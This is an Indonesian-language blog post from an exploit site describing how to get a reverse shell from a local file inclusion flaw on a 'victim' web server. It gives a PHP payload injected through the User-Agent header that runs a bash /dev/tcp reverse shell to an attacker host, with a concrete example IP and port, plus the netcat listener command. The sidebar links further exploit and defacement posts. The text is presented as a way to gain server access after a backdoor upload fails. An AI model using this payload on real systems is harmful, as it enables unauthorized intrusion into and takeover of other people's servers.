• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Reverse Shell From Local File Inclusion Exploit

June 8, 2016 by Jack Wilder 1 Comment

Kali ini saya hanya share tutorial ringan mengenai cara mendapatkan remote shell dari LFI exploit. Ini tentu sangat berguna saat kita gagal mengupload backdoor ke web korban atau bahkan akan memudahkan kita saat ingin melakukan rooting server.
Sebelum meneruskan tutorial ini, saya anggap kalian sudah paham dasar dari LFI exploit itu sendiri.

Untuk tutorialnya bisa baca disini :

Uploading Backdoor Shell via Local File Inclusion (LFI) Exploit
Hanya saja seperti kasus yang saya alami, kadang kala kita gagal mengupload backdoor ke web target. Akibatnya web gagal di expore.
Nah silahkan lihat ss berikut :
Yup, bash shell dari web target.
Caranya cukup mudah, saat melakukan proses tamper data, user-agent nya isikan command berikut :
<?system('bash -i >& /dev/tcp/ip-vps/port 0>&1');?>
Contoh :
<?system('bash -i >& /dev/tcp/54.179.146.109/1337 0>&1');?>
Nah tentu saja sebelum melakukan tamper data kalian harus mengaktifkan netcat terlebih dahulu.
[root@vps]# nc -l 1337

Dan kalo servernya memang bisa di back connect, kita akan mendapatkan akses shell ke server target di vps kita.
Oke sekian tutorial kali ini, semoga bermanfaat.

Shares

Filed Under: LFI Tagged With: Exploit, Linux, SSH

Reader Interactions

Comments

  1. kakatoji says

    September 11, 2017 at 8:55 pm

    Mantap mas

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Open Redirect Bypass Cheat Sheet

WordPress 4.7.0/4.7.1 Content Injection Exploit

RCE pada Redis via Master-Slave Replication

Exploit WordPress Ajax Load More PHP Upload Vulnerability

MyBB 1.8.x SQL Injection Auto Exploit

Laravel PHPUnit Remote Code Execution

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Heroku Custom Domain or Subdomain Takeover

Prestashop Module Blocktestimonial File Upload Auto Exploit

LinuxSec / 73 queries in 0.10 seconds